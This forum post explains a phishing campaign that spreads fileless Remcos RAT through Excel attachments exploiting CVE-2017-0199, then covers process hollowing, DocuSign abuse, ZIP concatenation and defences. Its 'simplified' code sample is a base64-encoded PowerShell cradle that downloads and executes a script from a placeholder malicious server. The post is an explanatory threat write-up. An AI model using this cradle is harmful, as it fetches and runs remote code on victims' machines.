- by x32x01 ||
Cybercriminals are constantly finding new ways to trick users and bypass security tools. One of the latest and most dangerous techniques involves using Microsoft Excel files to spread a fileless version of Remcos RAT malware. This attack combines phishing, old but effective Office exploits, and in-memory execution to stay hidden for as long as possible. 😈
In this thread, we will break down the attack in a simple and clear way, explain how it works step by step, and show why it is still effective today. If you are interested in cybersecurity, malware analysis, or penetration testing, this deep dive will be very useful for you.
Once installed on a victim’s system, Remcos RAT allows attackers to:
In a fileless attack, the malware:
Common tricks used in the email:
This vulnerability allows remote code execution when Office loads a specially crafted file that contains an external reference.
This technique helps attackers hide malicious behavior in plain sight.
In this attack, Remcos RAT is loaded directly into memory instead of being saved as a file. This makes it a true fileless variant.
Key capabilities include:
This technique combines multiple ZIP archives into a single file. Different tools extract these files differently.
Understanding how these attacks work is the first step toward defending against them. Stay updated, stay cautious, and always think before opening unexpected attachments. 🔐
In this thread, we will break down the attack in a simple and clear way, explain how it works step by step, and show why it is still effective today. If you are interested in cybersecurity, malware analysis, or penetration testing, this deep dive will be very useful for you.
What Is Remcos RAT? 🖥️
Remcos RAT (Remote Control and Surveillance) is a commercial remote access tool. It was originally designed for legitimate remote administration, but attackers have heavily abused it for cybercrime.Once installed on a victim’s system, Remcos RAT allows attackers to:
- Collect sensitive system information 📊
- Control the computer remotely 🎮
- Execute commands and scripts 🧠
- Spy on users using the webcam and microphone 🎥🎙️
Why Fileless Malware Is So Dangerous ⚠️
Traditional malware usually writes files to disk. Security tools often detect these files and stop the attack. Fileless malware works differently.In a fileless attack, the malware:
- Runs directly in memory (RAM)
- Uses trusted system tools like PowerShell or mshta.exe
- Leaves very few traces on disk
How the Excel Phishing Attack Starts 📧
The attack begins with a phishing email that looks like a purchase order or invoice. These emails are designed to create urgency and curiosity.Common tricks used in the email:
- Fake company names
- Professional-looking language
- An attached Microsoft Excel file 📎
Exploiting Microsoft Office (CVE-2017-0199) 🧨
The malicious Excel document exploits a known Microsoft Office vulnerability called CVE-2017-0199.This vulnerability allows remote code execution when Office loads a specially crafted file that contains an external reference.
What Happens Behind the Scenes
- The Excel file triggers the exploit
- Office downloads a malicious HTA file from a remote server
- The file is launched using mshta.exe, a trusted Windows tool
HTA File and Multi-Layer Obfuscation 🧩
The downloaded HTA file is heavily obfuscated to avoid detection. It uses multiple layers of:- JavaScript
- Visual Basic Script (VBS)
- PowerShell
Example of Obfuscated PowerShell (Simplified)
Code:
$encoded = "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBhAGwAaQBjAGkAbwB1AHMALgBzAGUAcgB2AGUAcgAiACk="
IEX ([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($encoded))) Process Hollowing and In-Memory Execution 🧠
After the initial payload runs, the malware uses a technique called process hollowing.What Is Process Hollowing?
Process hollowing works like this:- A legitimate process is started (for example: explorer.exe)
- Its memory is emptied
- Malicious code is injected into it
In this attack, Remcos RAT is loaded directly into memory instead of being saved as a file. This makes it a true fileless variant.
What Can Remcos RAT Do on an Infected System 🛑
Once Remcos RAT is active, attackers gain almost full control over the system.Key capabilities include:
- Stealing files 📂
- Logging keystrokes ⌨️
- Capturing clipboard data 📋
- Recording the screen 🎥
- Managing services and processes ⚙️
- Editing the Windows Registry 🧾
- Downloading additional malware ⬇️
Abuse of Legitimate Services Like DocuSign 🧾
Attackers are also abusing trusted platforms like DocuSign to make phishing attacks more convincing.How the DocuSign Scam Works
- Attackers create real, paid DocuSign accounts
- They use APIs to generate fake invoice templates
- The emails look 100% legitimate
- Request payment outside DocuSign
- Forward signed documents to finance departments
ZIP File Concatenation to Bypass Detection 📦
Another advanced trick used in recent campaigns is ZIP file concatenation.This technique combines multiple ZIP archives into a single file. Different tools extract these files differently.
Why This Is Dangerous
- 7-Zip, WinRAR, and Windows Explorer behave differently
- Some tools may ignore hidden malicious content
- Security scanners may miss the payload entirely
Real-World Threat Actors Using These Techniques 🐺
A threat group known as Venture Wolf has been linked to phishing campaigns targeting industries like:- Manufacturing
- Construction
- IT services
- Telecommunications
How to Protect Yourself and Your Organization 🛡️
To reduce the risk of these attacks, follow these best practices:- Keep Microsoft Office fully updated 🔄
- Disable Office macros if not needed 🚫
- Monitor PowerShell and mshta.exe usage 👀
- Train users to spot phishing emails 🎓
- Use advanced endpoint detection solutions
Final Thoughts 🧠
This campaign shows how attackers combine old vulnerabilities, trusted tools, and social engineering to create highly effective attacks. Fileless malware like Remcos RAT is especially dangerous because it hides in memory and avoids traditional detection methods.Understanding how these attacks work is the first step toward defending against them. Stay updated, stay cautious, and always think before opening unexpected attachments. 🔐
Last edited: